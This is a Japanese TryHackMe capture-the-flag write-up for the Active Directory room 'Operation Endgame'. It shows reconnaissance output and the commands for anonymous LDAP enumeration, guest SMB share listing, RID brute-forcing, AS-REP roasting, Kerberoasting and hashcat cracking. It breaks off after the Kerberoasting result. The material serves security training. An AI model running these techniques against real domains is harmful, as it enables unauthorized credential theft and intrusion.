はじめに
本記事は、TryHackMeのwriteupです。
Roomは、Operation Endgame、Difficulty(難易度)はHardです。
このRoomでは、Operation EndgameにおけるActive Direcctory環境の悪用について学ぶことができます。
Recon
Port Scan
Nmap scan report for [target_ip]
Host is up, received reset ttl 126 (0.21s latency).
Scanned at 2026-04-18 21:16:04 JST for 144s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
80/tcp open http syn-ack ttl 126 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-04-18 12:16:11Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
443/tcp open ssl/https? syn-ack ttl 126
|_ssl-date: 2026-04-18T12:18:19+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-12T07:26:00
| Not valid after: 2028-05-12T07:35:59
| MD5: c249 3bc6 fd31 f2aa 83cb 2774 bc66 9151
| SHA-1: 397a 54df c1ff f9fd 57e4 a944 00e8 cfdb 6e3a 972b
| SHA-256: 6915 c48a f18a bfee e8a2 084f 5088 8358 2582 11b5 f01a 7da0 3443 117b 8cbd 6031
| -----BEGIN CERTIFICATE-----
| MIIDaTCCAlGgAwIBAgIQUiXALddQ7bNA6YS8dfCQKTANBgkqhkiG9w0BAQsFADBH
| MRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgN0aG0xGTAX
| BgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwHhcNMjMwNTEyMDcyNjAwWhcNMjgwNTEy
| MDczNTU5WjBHMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZ
| FgN0aG0xGTAXBgNVBAMTEHRobS1MQUJZUklOVEgtQ0EwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQC/NNh6IN5jNgejLjqq9/RVDR42kxE0UZvnW6cB1LNb
| 0c4GyNmA1h+oLDpz1DonC3Yhp9XPQJIj4ejN1ErCQFMAxW4Xcd/Gt/LSCjdBHgmR
| R8wItUOpOoXkQtVRUE4I7vlWzxBuCVo644NaNzbfqVj7M1/nCBjn/PPd2fX3etSX
| EsaI6bYcdmKRimC/94UP8qTs6Z+KGasXUmb7Sj8vscncY8lFLe9qREuiRrom5Q8A
| NySO4t8mtmqIHrBb8zTTZ9N/HxEOPDafCSTOjRhDVsOXVuWllTJujjSu+jJlBiF/
| aiXM7mOmsxH1rqCUK9mhZFSf/OhvgsvAq66sTBs1huE1AgMBAAGjUTBPMAsGA1Ud
| DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBQJcLfjxXJyk7BxDCNC
| pJb9vgIdEzAQBgkrBgEEAYI3FQEEAwIBADANBgkqhkiG9w0BAQsFAAOCAQEAmnUK
| Wj9AoBc2fuoVml4Orlg+ce7x+1IBTpqeKaobBx/ez+i5mV2U45MgPHPwjHzf15bn
| 0BnYpJUhlEljx7+voM+pfP/9Q21v5iXjgIcH9FLau2nqhcQOnttNj8I4aoDr5rRG
| fJJv+hAuNXxr/Fy5M7oghCpNqxseEU9OcgIPRHp6X/8bTtEYWaHnD3GS6uUR2jai
| PhReAcCPTbRwMRA3KsGRaBF3+PsIOL0JtCR+QGfOugPhUJFOU7w0dwbFmzfRcgKw
| bJhEy3o0FL5aqKVC823QJE7LosyLdtAqtZY7OgtT0Do7RZzdsZ1If0JmYmHTSRVz
| 8CvPpcCDp68aiTtqgA==
|_-----END CERTIFICATE-----
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-04-18T12:18:19+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: thm.local
| DNS_Computer_Name: ad.thm.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-18T12:17:10+00:00
| ssl-cert: Subject: commonName=ad.thm.local
| Issuer: commonName=ad.thm.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T12:13:45
| Not valid after: 2026-10-17T12:13:45
| MD5: 513c 3827 2e2c a645 6a6e 974f 41df dc3f
| SHA-1: c705 13f5 4655 e77d 470d c1a6 4742 1aa4 b022 5e6b
| SHA-256: a6c2 94b2 7335 7c61 caa1 463f 0eff a8cb 75c4 b841 ba9f 1531 3631 a481 7135 ed50
| -----BEGIN CERTIFICATE-----
| MIIC3DCCAcSgAwIBAgIQdhdwVBPrK6JFhpxFZu2jiTANBgkqhkiG9w0BAQsFADAX
| MRUwEwYDVQQDEwxhZC50aG0ubG9jYWwwHhcNMjYwNDE3MTIxMzQ1WhcNMjYxMDE3
| MTIxMzQ1WjAXMRUwEwYDVQQDEwxhZC50aG0ubG9jYWwwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQDCEdS4IR4Lop7CGzax0ODQhzJb8hr7VCwJ9sRfTdF2
| C/wxJIEHRZso3z6UBtZGX7a8bq2zwmaB6+J3CQ+FDEuREjwfdA3ujdqnKvohesxl
| Qw9ECpc8AgBw05XiiR1Rm3ViTNxQJYqzExa1iLPCZ3MHyNOMLd2Ad9DEoTi7D6yB
| d3cZ7eNE7wgQyjx+jmGLHoADVdR64Y+86BvBmWv0KVud/6Yu+HvNTWJWenC6wUY9
| cIE8SioNuB8dCng84ttxAU8h/Y5C8kLVnP5hkERrzvLBWtlNztpWBKk1ttbBETX+
| EFXNPKPqztGf7yEOQwBfPAKZGAWI5y0IXTaLmUrJ/ti5AgMBAAGjJDAiMBMGA1Ud
| JQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEA
| ZYXW9zd7GD3xj3G2/k82KDrb2j/GePeaHwe/mbLm5XdjQUzG+np7bAdHLN73vtVK
| UltTTG+CZ4d8CCe4EvENabYAG9S9AMbDn6XekEHvAsqBPV3Yc0fiyD5cgE58C2uT
| EVG1LZ0pJ1JkA/1ivZQ4WTFQtwx4FXabgANuHkh2JUHRh9wVK4cAk5EMXiDgXJY+
| rtsmb5bKCj4WGR9zVCHoFxQpOYgibYUmF+YDg1DnsabC0yuP8rQFm/NwSc13DcWo
| Z8+nTOaL3GPmdTromK3x6XhywTrBIR4/jbwUdHzk35g70+pLMZ0A2dtBf4AwfDwV
| oANP8qXmbHnKXkQbCUD1dQ==
|_-----END CERTIFICATE-----
7680/tcp open pando-pub? syn-ack ttl 126
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
47001/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49681/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49696/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49711/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49717/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49732/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25814/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46874/tcp): CLEAN (Couldn't connect)
| Check 3 (port 12125/udp): CLEAN (Failed to receive data)
| Check 4 (port 43375/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-04-18T12:17:11
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:18
Completed NSE at 21:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:18
Completed NSE at 21:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:18
Completed NSE at 21:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.19 seconds
Raw packets sent: 35 (1.516KB) | Rcvd: 32 (1.404KB)
上記ポートスキャンの結果を基に調査を行います。
enum4linux
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Apr 18 21:27:06 2026
=========================================( Target Information )=========================================
Target ........... [target_ip]
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on [target_ip] )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for [target_ip] )===============================
Looking up status of [target_ip]
No reply from [target_ip]
===================================( Session Check on [target_ip] )===================================
[+] Server [target_ip] allows sessions using username '', password ''
================================( Getting domain SID for [target_ip] )================================
Domain Name: THM
Domain Sid: S-1-5-21-1966530601-3185510712-10604624
[+] Host is part of a domain (not a workgroup)
==================================( OS information on [target_ip] )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for [target_ip] from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on [target_ip] )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on [target_ip] )=================================
do_connect: Connection to [target_ip] failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on [target_ip]
===========================( Password Policy Information for [target_ip] )===========================
Password:
[E] Unexpected error from polenum:
[+] Attaching to [target_ip] using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:[target_ip])
[+] Trying protocol 445/SMB...
[!] Protocol failed: rpc_s_access_denied
[E] Failed to get password policy with rpcclient
======================================( Groups on [target_ip] )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on [target_ip] via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-5-21-1966530601-3185510712-10604624
[I] Found new SID:
S-1-5-21-1966530601-3185510712-10604624
[+] Enumerating users using SID S-1-5-21-1966530601-3185510712-10604624 and logon username '', password ''
S-1-5-21-1966530601-3185510712-10604624-500 THM\Administrator (Local User)
S-1-5-21-1966530601-3185510712-10604624-501 THM\Guest (Local User)
S-1-5-21-1966530601-3185510712-10604624-502 THM\krbtgt (Local User)
S-1-5-21-1966530601-3185510712-10604624-512 THM\Domain Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-513 THM\Domain Users (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-514 THM\Domain Guests (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-515 THM\Domain Computers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-516 THM\Domain Controllers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-517 THM\Cert Publishers (Local Group)
S-1-5-21-1966530601-3185510712-10604624-518 THM\Schema Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-519 THM\Enterprise Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-520 THM\Group Policy Creator Owners (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-521 THM\Read-only Domain Controllers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-522 THM\Cloneable Domain Controllers (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-525 THM\Protected Users (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-526 THM\Key Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-527 THM\Enterprise Key Admins (Domain Group)
S-1-5-21-1966530601-3185510712-10604624-1008 THM\AD$ (Local User)
[+] Enumerating users using SID S-1-5-21-803298453-2984830555-3352418973 and logon username '', password ''
S-1-5-21-803298453-2984830555-3352418973-500 AD\Administrator (Local User)
S-1-5-21-803298453-2984830555-3352418973-501 AD\Guest (Local User)
S-1-5-21-803298453-2984830555-3352418973-503 AD\DefaultAccount (Local User)
S-1-5-21-803298453-2984830555-3352418973-504 AD\WDAGUtilityAccount (Local User)
S-1-5-21-803298453-2984830555-3352418973-513 AD\None (Domain Group)
===============================( Getting printer info for [target_ip] )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Apr 18 21:36:40 2026
上記により、Password Policy Informationに対してパスワード認証があり、SIDやRIDからUsersが列挙されていることがわかります。
Scanning
糸鎚が何も見えなさそうですが、一度試せるものがあります。
ldapsearchを使用して、ドメインコントローラー対して、LDAP Null Bind(匿名バインド)を許可しているかを調べてみます。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ldapsearch -x -H ldap://[target_ip] -b "DC=thm,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=thm,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# thm.local
dn: DC=thm,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=thm,DC=local
instanceType: 5
whenCreated: 20230512072440.0Z
whenChanged: 20260418121336.0Z
subRefs: DC=ForestDnsZones,DC=thm,DC=local
subRefs: DC=DomainDnsZones,DC=thm,DC=local
subRefs: CN=Configuration,DC=thm,DC=local
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAzIq23BrAck2BE8AI/Pqy+g==
uSNChanged: 286789
name: thm
objectGUID:: uJV0oyUyQUCfgYWXQdbMjA==
creationTime: 134209880165348782
forceLogoff: -9223372036854775808
lockoutDuration: -6000000000
lockOutObservationWindow: -6000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1008
pwdProperties: 0
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAAKeA2dTgJ371Q0KEA
serverState: 1
uASCompat: 1
modifiedCount: 1
auditingPolicy:: AAE=
nTMixedDomain: 0
rIDManagerReference: CN=RID Manager$,CN=System,DC=thm,DC=local
fSMORoleOwner: CN=NTDS Settings,CN=AD,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=thm,DC=local
systemFlags: -1946157056
wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=thm,
DC=local
wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Progra
m Data,DC=thm,DC=local
wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=thm
,DC=local
wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrin
cipals,DC=thm,DC=local
wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=
thm,DC=local
wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=t
hm,DC=local
wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=thm
,DC=local
wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=thm,DC=lo
cal
wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,
DC=thm,DC=local
.......
.......
すると、結果として多くの情報を収集できました。
閲覧したところ、enum4linuxでも列挙されていないユーザーを収集するために以下のようなコマンドを実行します。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ldapsearch -x -H ldap://10.48.183.252 -b "DC=thm,DC=local" "(objectClass=user)" > users_full.txt
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ grep -i "description" users_full.txt
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
description: Tier 1 User
....
....
description: Tier 1 User
description: Tier 1 User
$ grep -i "servicePrincipalName" users_full.txt
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ad.thm.local
servicePrincipalName: ldap/ADD/THM
servicePrincipalName: HOST/AD/thm.local
servicePrincipalName: ldap/LABYRINTH/ForestDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/THM
servicePrincipalName: ldap/AD/ForestDnsZones.thm.local
servicePrincipalName: ldap/ADD/ForestDnsZones.thm.local
servicePrincipalName: ldap/LABYRINTH/THM
servicePrincipalName: ldap/LABYRINTH/DomainDnsZones.thm.local
servicePrincipalName: HOST/ADD/thm.local
servicePrincipalName: ldap/AD/DomainDnsZones.thm.local
servicePrincipalName: ldap/ADD/DomainDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/thm.local
servicePrincipalName: GC/ADD/thm.local
servicePrincipalName: ldap/LABYRINTH/thm.local
servicePrincipalName: GC/LABYRINTH/thm.local
servicePrincipalName: ldap/AD/thm.local
servicePrincipalName: ldap/ADD/thm.local
servicePrincipalName: GC/AD/thm.local
servicePrincipalName: HOST/ADD/THM
servicePrincipalName: TERMSRV/LABYRINTH
servicePrincipalName: RestrictedKrbHost/LABYRINTH
servicePrincipalName: HOST/LABYRINTH
servicePrincipalName: ldap/LABYRINTH
servicePrincipalName: HOST/AD/THM
servicePrincipalName: ldap/AD/THM
servicePrincipalName: ldap/ad.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/ad.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/AD
servicePrincipalName: TERMSRV/ad.thm.local
servicePrincipalName: DNS/ad.thm.local
servicePrincipalName: GC/ad.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/ad.thm.local
servicePrincipalName: RestrictedKrbHost/AD
servicePrincipalName: HOST/ad.thm.local/THM
servicePrincipalName: HOST/AD
servicePrincipalName: HOST/ad.thm.local
servicePrincipalName: HOST/ad.thm.local/thm.local
servicePrincipalName: ldap/ad.thm.local/THM
servicePrincipalName: ldap/AD
servicePrincipalName: ldap/ad.thm.local
servicePrincipalName: ldap/ad.thm.local/thm.local
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/add.thm.local
servicePrincipalName: ldap/add.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/add.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/ADD
servicePrincipalName: TERMSRV/add.thm.local
servicePrincipalName: DNS/add.thm.local
servicePrincipalName: GC/add.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/add.thm.local
servicePrincipalName: RestrictedKrbHost/ADD
servicePrincipalName: HOST/add.thm.local/THM
servicePrincipalName: HOST/ADD
servicePrincipalName: HOST/add.thm.local
servicePrincipalName: HOST/add.thm.local/thm.local
servicePrincipalName: ldap/add.thm.local/THM
servicePrincipalName: ldap/ADD
servicePrincipalName: ldap/add.thm.local
servicePrincipalName: ldap/add.thm.local/thm.local
servicePrincipalName: RPC/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loca
servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/dcb68acc-c01a-4d72-
servicePrincipalName: ldap/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loc
すると、簡単にユーザーアカウントのユーザー名を収集できました。
ただ、これだと何がなんだかよくわからないですね
とりあえず、オペレーティング システムの以前のバージョンを実行しているクライアントとサーバーをサポートするために使用されるログオン名とSPNアカウントが一致するユーザーアカウントを特定するとアプローチとして良さそうな気がします。
必然と権限が高いアカウントを探索できるためです。
以下のようなコマンドで検索してみました。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ grep -E "sAMAccountName|servicePrincipalName" users_full.txt | grep -B 1 "servicePrincipalName"
sAMAccountName: AD$
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ad.thm.local
servicePrincipalName: ldap/ADD/THM
servicePrincipalName: HOST/AD/thm.local
servicePrincipalName: ldap/LABYRINTH/ForestDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/THM
servicePrincipalName: ldap/AD/ForestDnsZones.thm.local
servicePrincipalName: ldap/ADD/ForestDnsZones.thm.local
servicePrincipalName: ldap/LABYRINTH/THM
servicePrincipalName: ldap/LABYRINTH/DomainDnsZones.thm.local
servicePrincipalName: HOST/ADD/thm.local
servicePrincipalName: ldap/AD/DomainDnsZones.thm.local
servicePrincipalName: ldap/ADD/DomainDnsZones.thm.local
servicePrincipalName: HOST/LABYRINTH/thm.local
servicePrincipalName: GC/ADD/thm.local
servicePrincipalName: ldap/LABYRINTH/thm.local
servicePrincipalName: GC/LABYRINTH/thm.local
servicePrincipalName: ldap/AD/thm.local
servicePrincipalName: ldap/ADD/thm.local
servicePrincipalName: GC/AD/thm.local
servicePrincipalName: HOST/ADD/THM
servicePrincipalName: TERMSRV/LABYRINTH
servicePrincipalName: RestrictedKrbHost/LABYRINTH
servicePrincipalName: HOST/LABYRINTH
servicePrincipalName: ldap/LABYRINTH
servicePrincipalName: HOST/AD/THM
servicePrincipalName: ldap/AD/THM
servicePrincipalName: ldap/ad.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/ad.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/AD
servicePrincipalName: TERMSRV/ad.thm.local
servicePrincipalName: DNS/ad.thm.local
servicePrincipalName: GC/ad.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/ad.thm.local
servicePrincipalName: RestrictedKrbHost/AD
servicePrincipalName: HOST/ad.thm.local/THM
servicePrincipalName: HOST/AD
servicePrincipalName: HOST/ad.thm.local
servicePrincipalName: HOST/ad.thm.local/thm.local
servicePrincipalName: ldap/ad.thm.local/THM
servicePrincipalName: ldap/AD
servicePrincipalName: ldap/ad.thm.local
servicePrincipalName: ldap/ad.thm.local/thm.local
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/add.thm.local
servicePrincipalName: ldap/add.thm.local/ForestDnsZones.thm.local
servicePrincipalName: ldap/add.thm.local/DomainDnsZones.thm.local
servicePrincipalName: TERMSRV/ADD
servicePrincipalName: TERMSRV/add.thm.local
servicePrincipalName: DNS/add.thm.local
servicePrincipalName: GC/add.thm.local/thm.local
servicePrincipalName: RestrictedKrbHost/add.thm.local
servicePrincipalName: RestrictedKrbHost/ADD
servicePrincipalName: HOST/add.thm.local/THM
servicePrincipalName: HOST/ADD
servicePrincipalName: HOST/add.thm.local
servicePrincipalName: HOST/add.thm.local/thm.local
servicePrincipalName: ldap/add.thm.local/THM
servicePrincipalName: ldap/ADD
servicePrincipalName: ldap/add.thm.local
servicePrincipalName: ldap/add.thm.local/thm.local
servicePrincipalName: RPC/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loca
servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/dcb68acc-c01a-4d72-
servicePrincipalName: ldap/dcb68acc-c01a-4d72-8113-c008fcfab2fa._msdcs.thm.loc
--
sAMAccountName: CODY_ROY
servicePrincipalName: HTTP/server.secure.com
すると、なんとヒットしました。
どうやら、CODY_ROYというユーザー名を鍵に調査を進めると良さそうです。
Exploitation
impacket-GetUserSPNsを使用したKerberoasting攻撃により、TGSチケットを発行するのかを実際に検証してみましょう。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ impacket-GetUserSPNs thm.local/ -dc-ip [target_ip] -request -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------- -------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/server.secure.com CODY_ROY CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local 2024-05-10 23:06:07.611965 2024-04-25 00:41:18.970113
[-] CCache file is not found. Skipping...
[-] invalid principal syntax
残念ながら、発行してくれなさそうです。
先ほど検出されたserver.secure.comにも何かないかをディレクトリ列挙してみます。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u server.secure.com
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://server.secure.com
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
aspnet_client (Status: 301) [Size: 162] [--> http://server.secure.com/aspnet_client/]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
特になさそうです。
色々悩みましたが、ちょっとだけ他人のwriteupをこっそり閲覧しました。
完全に忘れていました。guestユーザーからSamabaの共有フォルダを列挙できるそうです。
実際に検証しました。
$ nxc smb [target_ip] -u 'guest' -p '' --shares
SMB 10.48.183.252 445 AD [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB [target_ip] 445 AD [+] thm.local\guest:
SMB [target_ip] 445 AD [*] Enumerated shares
SMB [target_ip] 445 AD Share Permissions Remark
SMB [target_ip] 445 AD ----- ----------- ------
SMB [target_ip] 445 AD ADMIN$ Remote Admin
SMB [target_ip] 445 AD C$ Default share
SMB [target_ip] 445 AD IPC$ READ Remote IPC
SMB [target_ip] 445 AD NETLOGON Logon server share
SMB [target_ip] 445 AD SYSVOL Logon server share
痛恨のミスです。
ここから、再度ユーザーアカウントを収集します。
$ nxc smb [target_ip] -u 'guest' -p '' --rid > rid_brute.txt
$ cat rid_brute.txt | grep "SidTypeUser" | cut -d'\' -f2 | cut -d' ' -f1 > usernames.txt
このタイミングで、/etc/hostsに以下の情報を追加しましょう。
[target_ip] AD.thm.local thm.local AD
設定後、収集したユーザー名を利用し、NetExecでAS-REP Hashを発行するかを検証したところ、発行できました。
$ nxc ldap AD.thm.local -u usernames.txt -p '' --asreproast nxc-asreproasting.txt
実際に解読してみましたが、クラックはできませんでした。
$ sudo hashcat -a 0 -m 18200 nxc-asreproasting.txt /usr/share/wordlists/rockyou.txt
指定したIPをドメイン名に変更して、Kerberoasting攻撃できないかを検証してみます。
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ nxc ldap AD.thm.local -u guest -p '' --kerberoasting nxc-kerberoasting.txt
LDAP [target_ip] 389 AD [*] Windows 10 / Server 2019 Build 17763 (name:AD) (domain:thm.local) (signing:None) (channel binding:No TLS cert)
LDAP [target_ip] 389 AD [+] thm.local\guest:
LDAP [target_ip] 389 AD [*] Total of records returned 1
LDAP [target_ip] 389 AD [*] sAMAccountName: CODY_ROY, memberOf: CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local, pwdLastSet: 2024-05-10 23:06:07.611965, lastLogon: 2024-04-25 00:41:18.970113
